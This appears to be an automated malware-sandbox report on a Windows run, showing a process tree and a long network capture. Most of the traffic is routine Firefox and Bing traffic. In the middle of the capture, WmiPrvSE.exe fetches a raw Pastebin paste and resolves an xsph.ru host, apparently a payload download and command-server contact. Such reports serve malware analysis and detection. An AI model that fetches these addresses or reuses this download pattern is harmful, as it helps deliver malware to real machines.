    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.1.777649972\1294192441" -parentBuildID 20221007134813 -prefsHandle 2348 -prefMapHandle 2344 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {082016a4-fbd1-4159-bdf4-aa8a87807176} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 2376 1c1e6470758 socket
    3⤵
    PID:4916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.2.154560074\463148280" -childID 1 -isForBrowser -prefsHandle 3408 -prefMapHandle 3404 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20f91b59-ca6e-4e7f-a186-06fd9485f40b} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 3420 1c1fe2a8058 tab
    3⤵
    PID:5976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.3.779135237\1252516923" -childID 2 -isForBrowser -prefsHandle 3044 -prefMapHandle 3636 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e197e0a-38f3-4f9c-b524-9056768bbe91} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 3664 1c1fc5eb158 tab
    3⤵
    PID:5804
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.4.698054714\46091106" -childID 3 -isForBrowser -prefsHandle 4056 -prefMapHandle 4052 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a38f762-413e-4abb-8f1d-35fe55b5d22c} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 4068 1c1fca81158 tab
    3⤵
    PID:556
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.5.694757141\1793576139" -childID 4 -isForBrowser -prefsHandle 5104 -prefMapHandle 5088 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f14820a-b313-455b-867e-34239ff41f0f} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 5068 1c1f9ef0a58 tab
    3⤵
    PID:3772
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.6.2100760295\988714736" -childID 5 -isForBrowser -prefsHandle 4964 -prefMapHandle 4908 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27d41e68-b70a-462c-b9a5-f9c836678b2e} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 5060 1c1fc5cf858 tab
    3⤵
    PID:6004
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3392.7.1615020329\475156105" -childID 6 -isForBrowser -prefsHandle 5396 -prefMapHandle 5392 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1133601d-679d-40d5-8807-682f0a41b1bd} 3392 "\\.\pipe\gecko-crash-server-pipe.3392" 5404 1c1fc5eb458 tab
    3⤵
    PID:1648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:4636

Network

DNS

71.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

187.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.178.17.96.in-addr.arpa

IN PTR

Response

187.178.17.96.in-addr.arpa

IN PTR

a96-17-178-187deploystaticakamaitechnologiescom
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1A2E8452C3A8605C1A8E9068C2486149; domain=.bing.com; expires=Mon, 31-Mar-2025 11:32:55 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 883661DFF3024915AC96F80C3A29BE6A Ref B: LON04EDGE1013 Ref C: 2024-03-06T11:32:55Z
date: Wed, 06 Mar 2024 11:32:54 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1A2E8452C3A8605C1A8E9068C2486149

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=Hiz9HdJkVx9rGzOSXl-vAdMUnfDESXYlYry1jImrhcw; domain=.bing.com; expires=Mon, 31-Mar-2025 11:32:55 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CC7FD205A3BC4959B467C2AC6BFAFD8B Ref B: LON04EDGE1013 Ref C: 2024-03-06T11:32:55Z
date: Wed, 06 Mar 2024 11:32:54 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1A2E8452C3A8605C1A8E9068C2486149; MSPTC=Hiz9HdJkVx9rGzOSXl-vAdMUnfDESXYlYry1jImrhcw

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4251FBB748FD4D0FA40110C6E39B4181 Ref B: LON04EDGE1013 Ref C: 2024-03-06T11:32:55Z
date: Wed, 06 Mar 2024 11:32:54 GMT
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

pastebin.com

WmiPrvSE.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.67.143

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

172.67.34.170
GET

https://pastebin.com/raw/p3tpsvu4

WmiPrvSE.exe

Remote address:

104.20.67.143:443

Request

GET /raw/p3tpsvu4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 06 Mar 2024 11:33:14 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Wed, 06 Mar 2024 11:33:14 GMT
Server: cloudflare
CF-RAY: 8602079baa052402-LHR
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

a0926674.xsph.ru

WmiPrvSE.exe

Remote address:

8.8.8.8:53

Request

a0926674.xsph.ru

IN A

Response

a0926674.xsph.ru

IN A

141.8.192.6
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR
DNS

143.67.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.67.20.104.in-addr.arpa

IN PTR

Response
DNS

143.67.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.67.20.104.in-addr.arpa

IN PTR
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

190.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.178.17.96.in-addr.arpa

IN PTR

Response

190.178.17.96.in-addr.arpa

IN PTR

a96-17-178-190deploystaticakamaitechnologiescom
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

contile.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN A

Response

contile.services.mozilla.com

IN A

34.117.237.239
GET

https://contile.services.mozilla.com/v1/tiles

firefox.exe

Remote address:

34.117.237.239:443

Request

GET /v1/tiles HTTP/2.0
host: contile.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

contile.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN A

Response

contile.services.mozilla.com

IN A

34.117.237.239
DNS

contile.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN AAAA

Response
DNS

content-signature-2.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

content-signature-2.cdn.mozilla.net

IN A

Response

content-signature-2.cdn.mozilla.net

IN CNAME

content-signature-chains.prod.autograph.services.mozaws.net

content-signature-chains.prod.autograph.services.mozaws.net

IN CNAME

prod.content-signature-chains.prod.webservices.mozgcp.net

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

shavar.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.services.mozilla.com

IN A

Response

shavar.services.mozilla.com

IN CNAME

shavar.prod.mozaws.net

shavar.prod.mozaws.net

IN A

54.218.225.239

shavar.prod.mozaws.net

IN A

44.237.149.213

shavar.prod.mozaws.net

IN A

44.239.242.57
DNS

shavar.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.services.mozilla.com

IN A
DNS

push.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

push.services.mozilla.com

IN A

Response

push.services.mozilla.com

IN CNAME

autopush.prod.mozaws.net

autopush.prod.mozaws.net

IN A

34.107.243.93
DNS

autopush.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

autopush.prod.mozaws.net

IN A

Response

autopush.prod.mozaws.net

IN A

34.107.243.93
DNS

autopush.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

autopush.prod.mozaws.net

IN AAAA

Response
DNS

firefox.settings.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox.settings.services.mozilla.com

IN A

Response

firefox.settings.services.mozilla.com

IN CNAME

prod.remote-settings.prod.webservices.mozgcp.net

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
GET

https://push.services.mozilla.com/

firefox.exe

Remote address:

34.107.243.93:443

Request

GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: fZqhzjtyUR65rZcWw3qRmQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Response

HTTP/1.1 101 Switching Protocols

sec-websocket-accept: eOiTvzofcBdqJIZW9HaLV/Mqqw0=
date: Wed, 06 Mar 2024 11:34:15 GMT
Via: 1.1 google
Upgrade: websocket
Connection: Upgrade
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-modified-since: Fri, 25 Mar 2022 17:45:46 GMT
if-none-match: "1648230346554"
te: trailers

Response

HTTP/2.0 200

server: nginx
content-length: 24617
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Content-Type, Alert, Backoff, Content-Length
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Wed, 06 Mar 2024 10:53:12 GMT
age: 2478
last-modified: Wed, 06 Mar 2024 09:57:12 GMT
content-type: application/json
last-modified: Wed, 06 Mar 2024 09:57:12 GMT
content-type: application/json
GET

https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expected=%221709719032061%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/monitor/collections/changes/changeset?_expected=%221709719032061%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/normandy-recipes-capabilities/changeset?_expected=1709683264026

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/normandy-recipes-capabilities/changeset?_expected=1709683264026 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/language-dictionaries/changeset?_expected=1673270322227&_since=%221569410800356%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/language-dictionaries/changeset?_expected=1673270322227&_since=%221569410800356%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-recipes/changeset?_expected=1674595048726&_since=%221642005109349%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/password-recipes/changeset?_expected=1674595048726&_since=%221642005109349%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-rules/changeset?_expected=1679600032742&_since=%221659924409785%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/password-rules/changeset?_expected=1679600032742&_since=%221659924409785%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/fxmonitor-breaches/changeset?_expected=1683667257606

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/fxmonitor-breaches/changeset?_expected=1683667257606 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1701090424142&_since=%221606870304609%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1701090424142&_since=%221606870304609%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/devtools-compatibility-browsers/changeset?_expected=1709536180469&_since=%221662648201700%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/devtools-compatibility-browsers/changeset?_expected=1709536180469&_since=%221662648201700%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/sites-classification?_expected=1544035467383

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/sites-classification?_expected=1544035467383 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/anti-tracking-url-decoration?_expected=1564511755134

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/anti-tracking-url-decoration?_expected=1564511755134 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/public-suffix-list/changeset?_expected=1575468539758

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/public-suffix-list/changeset?_expected=1575468539758 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-default-override-allowlist?_expected=1595254618540

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/search-default-override-allowlist?_expected=1595254618540 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/pioneer-study-addons-v1/changeset?_expected=1607042143590

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/pioneer-study-addons-v1/changeset?_expected=1607042143590 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/top-sites?_expected=1647020600359

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/top-sites?_expected=1647020600359 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/doh-providers/changeset?_expected=1647549722107&_since=%221621943542621%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/doh-providers/changeset?_expected=1647549722107&_since=%221621943542621%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/doh-config/changeset?_expected=1651753780606&_since=%221621943462970%22

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/doh-config/changeset?_expected=1651753780606&_since=%221621943462970%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/devtools-devices?_expected=1653469171354

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/devtools-devices?_expected=1653469171354 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/websites-with-shared-credential-backends?_expected=1659924446436

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/websites-with-shared-credential-backends?_expected=1659924446436 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
